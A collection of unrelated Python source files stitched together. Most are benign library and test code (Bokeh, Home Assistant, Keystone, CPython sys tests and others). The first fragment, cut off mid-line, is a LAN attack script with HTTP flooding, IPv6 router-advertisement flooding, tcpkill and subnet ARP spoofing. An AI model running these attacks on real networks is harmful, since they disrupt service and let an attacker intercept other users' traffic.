parser.add_argument('-craft', action='store', dest='packetcraft', default=False,
help='Enable Packet Crafting.. Example: -craft IP-TCP-DST192.168.1.1-SRC192.168.1.10-DPORT80')
parser.add_argument('-stress', action='store', dest='stress', default="none",
help='Perform Stress Testing on LAN.. Modes: DHCPv4-50,DHCPv6')
results = parser.parse_args()
### Functions
def httpflood(target):
ip=target
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 80))
s.send("""GET /?="""+str(random.randrange(9999999))+""" HTTP/1.1\r\n
Connection: Keep-Alive """)
print """GET /"""+str(random.randrange(9999999))+""" HTTP/1.1\r\n
Connection: Keep-Alive """
except ValueError:
print "Host seems down or some connection error trying again..."
##################
if not(results.output):
output=str(time.time())
else:
output=results.output
syn=""
scantype="-sn" #basic ping scan
if not(results.timeout=="none"):
timeout="timeout "+results.timeout+"s "
print "\n\nTimeout set for seconds:"+results.timeout
else:
timeout=""
if(results.scan):
ipaddr=str(results.scan)
if(results.arpscan): ##BETA TEST
res,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ipaddr))
output=str(res.summary( lambda (s,r): r.sprintf("%Ether.src% %ARP.psrc%")))
file=open("arpscan.txt","a")
print output
file.write(output)
file.close()
else:
print ipaddr
if(results.syn):
scantype="-sS -O" #syn and
if(results.service):
scantype=scantype+" -sV"
scancmd=timeout+"sudo nmap "+scantype+" -oX "+output+" "+ipaddr #writes xml output so we can convert it into html
print scancmd
print os.popen(scancmd).read() #ping scan to know online hosts
if(results.ipv6ra):
minutes=results.ipv6ra
print "running for minutes: "+minutes
#run ipv6 RA flooding for N minutes
i=0
while (i <= minutes):
print "Firing RAs everywhere"
a = IPv6()
a.dst = "ff02::1" #IPv6 Destination "Everyone" Multicast (broadcast)
a.display()
b = ICMPv6ND_RA()
b.display()
c = ICMPv6NDOptSrcLLAddr()
c.lladdr = "00:50:56:24:3b:c0" #MAC
c.display()
d = ICMPv6NDOptMTU()
d.display()
e = ICMPv6NDOptPrefixInfo()
e.prefixlen = 64
randomhex=hex(random.randint(0, 16777215))[2:].upper()
prefix=randomhex[:4]
e.prefix = prefix+"::" #Global Prefix
e.display()
send(a/b/c/d/e) # Send the packet
print "Sending IPv6 RA Packet :)"
time.sleep(1)
i=i+1
print i
if not(results.denytcp=="none"): #Works if you are the gateway or during MITM
target=results.denytcp
os.popen("nohup "+timeout+"tcpkill host "+target+" >/dev/null 2>&1 &")
#deny tcp traffic
if not(results.mitmall=="none"): #Most efficient way to arpspoof subnet
ipnet=results.mitmall
iplist=os.popen("nmap -sP "+ipnet+" | grep 'Nmap scan' | awk '{ print $5; }'").read()
iplist=iplist.split()
dgip=os.popen("ip route show | grep 'default' | awk '{print $3}' ").read()
dg
|
mbudiu-vmw/hiero | data/metadata/differential-privacy/data/ontime_private/gen_metadata.py | Python | apache-2.0 | 3,456 | 0.005498 |
#!/usr/bin/env python3
# Copyright (c) 2020 VMware Inc. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import itertools
import string
infile = '../../../../ontime_private/short.schema'
states = [ "AK", "AL", "AR", "AZ", "CA", "CO", "CT", "DE", "FL", "GA", "HI", "IA", "ID", "IL", "IN", "KS",
"KY", "LA", "MA", "MD", "ME", "MI", "MN", "MO", "MS", "MT", "NC", "ND", "NE", "NH", "NJ", "NM",
"NV", "NY", "OH", "OK", "OR", "PA", "PR", "RI", "SC", "SD", "TN", "TT", "TX", "UT", "VA", "VT",
"WA", "WI", "WV", "WY" ]
carriers = ["9E", "AA", "AS", "B6", "CO", "DH", "DL", "EV", "F9", "FL", "G4", "GA", "HP", "KH", "MQ", "NK",
"NW", "OH", "OO", "TW", "TZ", "UA", "US", "VX", "WN", "XE", "YV", "YX"]
def get_metadata(cn):
if cn == "DayOfWeek":
(g, gMin, gMax) = (1, 1, 7)
elif cn == "DepTime" or cn == "ArrTime":
(g, gMin, gMax) = (5, 0, 240
|
0)
elif cn == "DepDelay" or cn == "ArrDelay":
(g, gMin, gMax) = (1, -100, 10
|
00)
elif cn == "Cancelled":
(g, gMin, gMax) = (1, 0, 1)
elif cn == "ActualElapsedTime":
(g, gMin, gMax) = (1, 15, 800)
elif cn == "Distance":
(g, gMin, gMax) = (10, 0, 5100)
elif cn == "FlightDate":
# cluster values: (86400000, 852076800000, 1561852800000)
# 2017 values: (86400000, 1483286400000, 1514736000000)
# 2016 values, 2 months: (86400000, 1451635200000, 1456732800000)
(g, gMin, gMax) = (86400000, 1451635200000, 1456732800000)
else:
raise Exception("Unexpected column " + cn)
return {'type': "DoubleColumnQuantization",
'granularity': g,
'globalMin': gMin,
'globalMax': gMax}
def get_string_metadata(col):
letters = list(string.ascii_uppercase)
if col == "OriginState" or col == "DestState":
letters = states
elif col == "UniqueCarrier":
letters = carriers
return {'type': "StringColumnQuantization",
'globalMax': 'a',
'leftBoundaries': letters }
def main():
colnames = []
with open(infile, 'r') as f:
contents = "".join(line for line in f)
schema = json.loads(contents)
colnames = map(lambda s: s["name"], schema)
length2 = itertools.combinations(colnames, 2)
length2 = [sorted(x) for x in length2]
with open('privacy_metadata.json', 'w') as f:
quantization = {}
defaultEpsilons = { "0": 1, "1": 1, "2": .1 }
for col in schema:
cn = col["name"]
if col["kind"] == "String":
quantization[cn] = get_string_metadata(cn)
else:
quantization[cn] = get_metadata(cn)
output = {'epsilons': {}, 'defaultEpsilons': defaultEpsilons, 'quantization': { 'quantization': quantization } }
f.write(json.dumps(output))
if __name__=='__main__':
main()
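# Added illustration, not part of the original script, of the quantization entries this
# emits: get_metadata("DayOfWeek") returns
#     {'type': 'DoubleColumnQuantization', 'granularity': 1, 'globalMin': 1, 'globalMax': 7}
# and each such entry is stored under quantization[column_name] inside
# privacy_metadata.json, next to the defaultEpsilons mapping.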
|
thehub/hubplus | scripts/patch_ref_creator_field.py | Python | gpl-3.0 | 267 | 0.011236 |
from apps.plus_permissions.default_
|
agents import get_admin_user
from apps.plus_permissions.models import GenericReference
def
|
patch():
for ref in GenericReference.objects.filter(creator=None):
ref.creator = get_admin_user()
ref.save()
patch()
|
aronsky/home-assistant | homeassistant/components/hassio/websocket_api.py | Python | apache-2.0 | 3,538 | 0 |
"""Websocekt API handlers for the hassio integration."""
import logging
import voluptuous as vol
from homeassistant.components import websocket_api
from homeassistant.components.websocket_api.connection import ActiveConnection
from homeassistant.core import HomeAssistant, callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.dispatcher import (
async_dispatcher_connect,
async_dispatcher_send,
)
from .const import (
ATTR_DATA,
ATTR_ENDPOINT,
ATTR_METHOD,
ATTR_RESULT,
ATTR_TIMEOUT,
ATTR_WS_EVENT,
DOMAIN,
EVENT_SUPERVISOR_EVENT,
WS_ID,
WS_TYPE,
WS_TYPE_API,
WS_TYPE_EVENT,
WS_TYPE_SUBSCRIBE,
)
from .handler import HassIO
SCHEMA_WEBSOCKET_EVENT = vol.Schema(
{vol.Required(ATTR_WS_EVENT): cv.string},
extra=vol.ALLOW_EXTRA,
)
_LOGGER: logging.Logger = logging.getLogger(__package__)
@callback
def async_load_websocket_api(hass: HomeAssistant):
"""Set up the websocket API."""
websocket_api.async_register_command(hass, websocket_supervisor_event)
websocket_api.async_register_command(hass, websocket_supervisor_api)
websocket_api.async_register_command(hass, websocket_subscribe)
@websocket_api.require_admin
@websocket_api.async_response
@websocket_api.websocket_command({vol.Required(WS_TYPE): WS_TYPE_SUBSCRIBE})
async def websocket_subscribe(
hass: HomeAssistant, connection: ActiveConnection, msg: dict
):
"""Subscribe to supervisor events."""
@callback
def forward_messages(data):
"""Forward events to websocket."""
connection.send_message(websocket_api.event_message(msg[WS_ID], data))
connection.subscriptions[msg[WS_ID]] = async_dispatcher_connect(
hass, EVENT_SUPERVISOR_EVENT, forward_messages
)
connection.send_message(websocket_api.result_message(msg[WS_ID]))
@websocket_api.async_response
@websocket_api.websocket_command(
{
vol.Required(WS_TYPE): WS_TYPE_EVENT,
vol.Required(ATTR_DATA): SCHEMA_WEBSOCKET_EVENT,
}
)
async def websocket_supervisor_event(
hass: HomeAssistant, connection: ActiveConnection, msg: dict
):
"""Publish events from the Supervisor."""
async_dispatcher_send(hass, EVENT_SUPERVISOR_EVENT, msg[ATTR_DATA])
connection.send_result(msg[WS_ID])
@websocket_api.require_admin
@websocket_api.async_response
@websocket_api.websocket_command(
{
vol.Required(WS_TYPE): WS_TYPE_API,
vol.Required(ATTR_ENDPOINT): cv.string,
vol.Required(ATTR_METHOD): cv.string,
vol.Optional(ATTR_DATA): dict,
vol.Optional(ATTR_TIMEOUT): vol.Any(cv.Number, None),
}
)
async def websocket_supervisor_api(
hass: HomeAssistant, connection: ActiveConnection, msg: dict
):
"""Websocket handler to call Supervisor API."""
supervisor: HassIO = hass.data[DOMAIN]
try:
result = await supervisor.send_command(
msg[ATTR_ENDPOINT],
method=msg[ATTR_METHOD],
|
timeout=msg.get(ATTR_TIMEOUT, 10),
payload=msg.get(ATTR_DATA, {}),
)
if result.get(ATTR_RESULT) == "error":
raise hass.components.hassio.HassioAPIError(result.get("message"))
except hass.components.hassio.HassioAPIError as err:
_LOGGER.error("Failed to to call %s - %s", msg[ATTR_ENDPOINT], err)
connection.send_error(
msg[WS_ID], code=websocket_api.ERR_UNKNOWN_ERROR, mes
|
sage=str(err)
)
else:
connection.send_result(msg[WS_ID], result.get(ATTR_DATA, {}))
|
bokeh/bokeh | tests/unit/bokeh/protocol/test_receiver.py | Python | bsd-3-clause | 5,417 | 0.00683 |
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2022, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import annotations # isort:skip
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Bokeh imports
from bokeh.core.serialization import Buffer
from bokeh.core.types import ID
from bokeh.protocol import Protocol
from bokeh.protocol.exceptions import ValidationError
# Module under test
from bokeh.protocol import receiver # isort:skip
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
proto = Protocol()
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
def test_creation() -> None:
receiver.Receiver(None)
async def test_validation_success() -> None:
msg = proto.create('ACK')
r = receiver.Receiver(proto)
partial = await r.consume(msg.header_json)
assert partial is None
partial = await r.consume(msg.metadata_json)
assert partial is None
partial = await r.consume(msg.content_json)
assert partial is not None
assert partial.msgtype == msg.msgtype
assert partial.header == msg.header
assert partial.content == msg.content
assert partial.metadata == msg.metadata
async def test_validation_success_with_one_buffer() -> None:
r = receiver.Receiver(proto)
partial = await r.consume('{"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":1}')
assert partial is None
partial = await r.consume('{}')
assert partial is None
partial = await r.consume('{"bar": 10}')
assert partial is None
partial = await r.consume('{"id": "buf_header"}')
assert partial is None
partial = await r.consume(b'payload')
assert partial is not None
assert partial.msgtype == "PATCH-DOC"
assert partial.header == {"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":1}
assert partial.content == {"bar":10}
assert partial.metadata == {}
assert partial.buffers == [Buffer(ID("buf_header"), b"payload")]
async def test_multiple_validation_success_
|
with_multiple_bu
|
ffers() -> None:
r = receiver.Receiver(proto)
for N in range(10):
partial = await r.consume(f'{{"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":{N}}}')
partial = await r.consume('{}')
partial = await r.consume('{"bar": 10}')
for i in range(N):
partial = await r.consume(f'{{"id": "header{i}"}}')
partial = await r.consume(f'payload{i}'.encode())
assert partial is not None
assert partial.msgtype == "PATCH-DOC"
assert partial.header == {"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers": N}
assert partial.content == {"bar":10}
assert partial.metadata == {}
for i in range(N):
assert partial.buffers[i] == Buffer(ID(f"header{i}"), f"payload{i}".encode())
async def test_binary_header_raises_error() -> None:
r = receiver.Receiver(proto)
with pytest.raises(ValidationError):
await r.consume(b'{"msgtype": "PATCH-DOC", "msgid": "10"}')
async def test_binary_metadata_raises_error() -> None:
r = receiver.Receiver(proto)
await r.consume('{"msgtype": "PATCH-DOC", "msgid": "10"}')
with pytest.raises(ValidationError):
await r.consume(b'metadata')
async def test_binary_content_raises_error() -> None:
r = receiver.Receiver(proto)
await r.consume('{"msgtype": "PATCH-DOC", "msgid": "10"}')
await r.consume('metadata')
with pytest.raises(ValidationError):
await r.consume(b'content')
async def test_binary_payload_header_raises_error() -> None:
r = receiver.Receiver(proto)
await r.consume('{"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":1}')
await r.consume('{}')
await r.consume('{}')
with pytest.raises(ValidationError):
await r.consume(b'{"id": "buf_header"}')
async def test_text_payload_buffer_raises_error() -> None:
r = receiver.Receiver(proto)
await r.consume('{"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":1}')
await r.consume('{}')
await r.consume('{}')
await r.consume('{"id": "buf_header"}')
with pytest.raises(ValidationError):
await r.consume('buf_payload')
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
atheendra/access_keys | keystone/token/providers/uuid.py | Python | apache-2.0 | 929 | 0 |
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Keystone UUID Token Provider"""
from __future__ import absolute_import
import uuid
|
from keystone.token.providers import common
class Provider(common.BaseProvider):
def
|
__init__(self, *args, **kwargs):
super(Provider, self).__init__(*args, **kwargs)
def _get_token_id(self, token_data):
return uuid.uuid4().hex
|
rybesh/pybtex | pybtex/backends/html.py | Python | mit | 2,255 | 0.002661 |
# Copyright (c) 2008, 2009, 2010, 2011 Andrey Golovizin
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
|
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from xml.sax.saxutils import escape
from pybtex.backends import BaseBackend
import pybt
|
ex.io
file_extension = 'html'
PROLOGUE = u"""<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head><meta name="generator" content="Pybtex">
<meta http-equiv="Content-Type" content="text/html; charset=%s">
<title>Bibliography</title>
</head>
<body>
<dl>
"""
class Backend(BaseBackend):
name = 'html'
suffixes = '.html',
symbols = {
'ndash': u'–',
'newblock': u'\n',
'nbsp': u' '
}
tags = {
'emph': u'em',
}
def format_text(self, text):
return escape(text)
def format_tag(self, tag_name, text):
tag = self.tags[tag_name]
return ur'<%s>%s</%s>' % (tag, text, tag)
def write_prologue(self, maxlen):
encoding = self.encoding or pybtex.io.get_default_encoding()
self.output(PROLOGUE % encoding)
def write_epilogue(self):
self.output(u'</dl></body></html>\n')
def write_entry(self, key, label, text):
self.output(u'<dt>%s</dt>\n' % label)
self.output(u'<dd>%s</dd>\n' % text)
|
hkjallbring/pusher-http-python | pusher/util.py | Python | mit | 1,209 | 0.014888 |
# -*- coding: utf-8 -*-
from __future__ import (print_function, unicode_literals, absolute_import,
division)
import json
import re
import six
import sys
channel_name_re = re.compile('\A[-a-zA-Z0-9_=@,.;
|
]+\Z')
app_id_re = re.compile('\A[0-9]+\Z')
pusher_url_re = re.compile('\A(http|https)://(.*):(.*)@(.*)/apps/([0-9]+)\Z')
socket_id_re = re.compile('\A\d+\.\d+\Z')
if sys.version_info < (3,):
text = 'a unicode string'
else:
text = 'a string'
def ensure_text(obj, name):
if isinstance(obj, six.text_type):
retur
|
n obj
if isinstance(obj, six.string_types):
return six.text_type(obj)
raise TypeError("%s should be %s" % (name, text))
def validate_channel(channel):
channel = ensure_text(channel, "channel")
if len(channel) > 200:
raise ValueError("Channel too long: %s" % channel)
if not channel_name_re.match(channel):
raise ValueError("Invalid Channel: %s" % channel)
return channel
def validate_socket_id(socket_id):
socket_id = ensure_text(socket_id, "socket_id")
if not socket_id_re.match(socket_id):
raise ValueError("Invalid socket ID: %s" % socket_id)
return socket_id
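# Added usage sketch, not part of the original module: both validators return the
# normalised text value on success and raise ValueError (or TypeError) otherwise.
# The example values below are hypothetical.
if __name__ == '__main__':
    print(validate_channel('private-user-42'))  # matches channel_name_re
    print(validate_socket_id('1234.5678'))      # matches socket_id_re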
|
MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-3.2/Lib/test/test_sys.py | Python | mit | 32,006 | 0.001843 |
import unittest, test.support
import sys, io, os
import struct
import subprocess
import textwrap
import warnings
import operator
import codecs
# count the number of test runs, used to create unique
# strings to intern in test_intern()
numruns = 0
try:
import threading
except ImportError:
threading = None
class SysModuleTest(unittest.TestCase):
def setUp(self):
self.orig_stdout = sys.stdout
self.orig_stderr = sys.stderr
self.orig_displayhook = sys.displayhook
def tearDown(self):
sys.stdout = self.orig_stdout
sys.stderr = self.orig_stderr
sys.displayhook = self.orig_displayhook
test.support.reap_children()
def test_original_displayhook(self):
import builtins
out = io.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(builtins, "_"):
del builtins._
dh(None)
self.assertEqual(out.getvalue(), "")
|
self.assertTrue(not hasattr(builtins, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqu
|
al(builtins._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
def test_lost_displayhook(self):
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
def test_original_excepthook(self):
err = io.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError as exc:
eh(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit as exc:
self.assertEqual(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with integer argument
try:
sys.exit(42)
except SystemExit as exc:
self.assertEqual(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with one entry
# entry will be unpacked
try:
sys.exit((42,))
except SystemExit as exc:
self.assertEqual(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit as exc:
self.assertEqual(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit as exc:
self.assertEqual(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def check_exit_message(code, expected, env=None):
process = subprocess.Popen([sys.executable, "-c", code],
stderr=subprocess.PIPE, env=env)
stdout, stderr = process.communicate()
self.assertEqual(process.returncode, 1)
self.assertTrue(stderr.startswith(expected),
"%s doesn't start with %s" % (ascii(stderr), ascii(expected)))
        # test that the stderr buffer is flushed before the exit message is
        # written into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
env = os.environ.copy()
env['PYTHONIOENCODING'] = 'latin-1'
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", env=env)
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
@unittest.skipIf(hasattr(sys, 'gettrace') and sys.gettrace(),
'fatal error if run with a trace function')
def test_recursionlimit_recovery(self):
# NOTE: this test is slightly fragile in that it depends on the current
# recursion count when executing the test being low enough so as to
# trigger the recursion recovery detection in the _Py_MakeEndRecCheck
# macro (see ceval.h).
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for i in (50, 1000):
# Issue #5392: stack overflow after hitting recursion limit twice
sys.setrecursionlimit(i)
self.assertRaises(RuntimeError, f)
self.assertRaises(RuntimeError, f)
finally:
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
|
nkripper/pynet
|
week1/json_intro_read.py
|
Python
|
apache-2.0
| 111
| 0.018018
|
#!/us
|
r/bin/python
im
|
port json
with open("test_json.json","r") as f:
new_list = json.load(f)
print new_list
|
mbareta/edx-platform-ft
|
lms/djangoapps/ccx/migrations/0009_auto_20170608_0525.py
|
Python
|
agpl-3.0
| 735
| 0.002721
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import datetime
class Migration(migrations.Migration):
d
|
ependencies = [
('ccx', '0008_auto_20170523_0630'),
|
]
operations = [
migrations.AlterField(
model_name='customcourseforedx',
name='delivery_mode',
field=models.CharField(default=b'IN_PERSON', max_length=255, choices=[(b'IN_PERSON', b'In Person'), (b'ONLINE_ONLY', b'Online')]),
),
migrations.AlterField(
model_name='customcourseforedx',
name='time',
field=models.DateTimeField(default=datetime.datetime(2017, 6, 8, 5, 24, 53, 908103)),
),
]
|
sosey/ginga
|
ginga/misc/Datasrc.py
|
Python
|
bsd-3-clause
| 3,565
| 0.001964
|
#
# Eric Jeschke (eric@naoj.org)
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import threading
class TimeoutError(Exception):
pass
class Datasrc(object):
def __init__(self, length=0):
self.length = length
self.cursor = -1
self.datums = {}
self.history = []
self.sortedkeys = []
self.cond = threading.Condition()
self.newdata = threading.Event()
def __getitem__(self, key):
with self.cond:
return self.datums[key]
def __setitem__(self, key, value):
self.push(key, value)
def __contains__(self, key):
with self.cond:
return key in self.datums
def has_key(self, key):
with self.cond:
return key in self.datums
def __delitem__(self, key):
self.remove(key)
def __len__(self):
with self.cond:
return len(self.history)
def push(self, key, value):
with self.cond:
if key in self.history:
self.history.remove(key)
self.history.append(key)
self.datums[key] = value
self._eject_old()
self.newdata.set()
self.cond.notify()
def pop_one(self):
return self.remove(self.history[0])
def pop(self, *args):
if len(args) == 0:
return self.remove(self.history[0])
assert len(args) == 1, \
ValueError("Too many parameters to pop()")
return self.remove(args[0])
def remove(self, key):
with self.cond:
val = self.datums[key]
self.history.remove(key)
del self.datums[key]
self.sortedkeys = list(self.datums.keys())
self.sortedkeys.sort()
return val
def _eject_old(self):
if (self.length is None) or (self.length <= 0):
# no limit
return
while len(self.history) > self.length:
oldest = self.history.pop(0)
del self.datums[oldest]
self.sortedkeys = list(self.datums.keys())
self.sortedkeys.sort()
def index(self, key):
with self.cond:
return self.history.index(key)
def index2key(self, index):
with self.cond:
return self.history[index]
def index2value(self, index):
with self.cond:
return self.datums[self.history[index]]
def youngest(self):
return self.datums[self.history[-1]]
def oldest(self):
return self.datums[self.history[0]]
def pop_oldest(self):
return self.pop(self.history[0])
def pop_youngest(self):
return self.pop(self.history[-1])
def keys(self, sort='alpha'):
with self.cond:
if sort == 'alpha':
return self.sortedkeys
elif sort == 'time':
return self.history
else:
return self.datums.keys()
def wait(self, timeout=None):
with self.cond:
self.cond.wait(timeout=timeout)
|
if not self.newdata.isSet():
|
raise TimeoutError("Timed out waiting for datum")
self.newdata.clear()
return self.history[-1]
def get_bufsize(self):
with self.cond:
return self.length
def set_bufsize(self, length):
with self.cond:
self.length = length
self._eject_old()
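# A minimal usage sketch (illustrative only; the keys and values below are made
# up). The buffer keeps at most `length` datums and ejects the oldest on push.
if __name__ == '__main__':
    _src = Datasrc(length=2)
    _src.push('a', 1)
    _src.push('b', 2)
    _src.push('c', 3)   # 'a' is ejected here; only 'b' and 'c' remain
    assert 'a' not in _src
    assert _src.oldest() == 2 and _src.youngest() == 3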
#END
|
allure-framework/allure-python
|
allure-pytest/test/acceptance/attachment/attachment_step_test.py
|
Python
|
apache-2.0
| 622
| 0
|
""" ./examples/attachment/attachment_step.rst """
from hamcrest import assert_that
from allure_commons_test.report i
|
mport has_test_case
from allure_commons_test.result import has_step
from allure_commons_test.result import has_attachment
def test_step_with_attachment(executed_docstring_path):
assert_that(executed_docstring_path.allure_report,
has_test_case("test_step_with_attachment",
has_step
|
("step_with_attachment",
has_attachment()
),
)
)
|
keflavich/agpy
|
agpy/showspec.py
|
Python
|
mit
| 51,670
| 0.020302
|
"""
showspec is my homegrown spectrum plotter, meant to somewhat follow STARLINK's
SPLAT and have functionality similar to GAIA, but with an emphasis on producing
publication-quality plots (which, while splat may do, it does unreproducibly)
.. todo::
-add spectrum arithmetic tools
(as is, you can use numpy.interp with sp.vind and sp.spectrum pretty
easily)
-implement other fitters
-e.g., NH3 hyperfine, Voigt
-move to object-oriented pylab/pyplot implementation (for bulk / speedup work)
-allow for non-plotting fitting work (curious... I've never needed that yet)
-Equivalent Width measurement without gaussian fitting
-probably should be part of the baseline code
-write documentation other people can read
12/21/2011 - ALL of the above to-do IS DONE! It's now hosted at <http://pyspeckit.bitbucket.org>
"""
import math
import pylab
from pylab import *
for k,v in pylab.__dict__.iteritems():
if hasattr(v,'__module__'):
if v.__module__ is None:
locals()[k].__module__ = 'pylab'
import matplotlib
from agpy.mpfit import mpfit
from collapse_gaussfit import *
from ratosexagesimal import *
import pyfits
import gaussfitter
import numpy
from numpy import isnan
from mad import MAD,nanmedian
def steppify(arr,isX=False,interval=0,sign=+1.0):
"""
*support function*
Converts an array to double-length for step plotting
"""
if isX and interval==0:
interval = numpy.abs(arr[1]-arr[0]) / 2.0
newarr = pylab.array(zip(arr-sign*interval,arr+sign*interval)).ravel()
return newarr
class SpecPlotter:
"""
SpecPlotter class. Takes in a spectrum or data cube, plotting properties,
and a velocity axis determination function. Look at splat_1d for a wrapper
that might actually be useful.
Whew, needs more documentation
"""
def __init__(self, cube, axis=None, xtol=None, ytol=None, vconv=lambda
x: x, xtora=lambda x: x, ytodec=lambda x: x, specname=None,
dv=None, color='k', hdr=None, errspec=None, maskspec=None,
fig=None, fignum=1, clear=True, title=None, xunits='km/s',
erralpha=0.2, ivconv=None, autorefresh=True, reffreq=None,
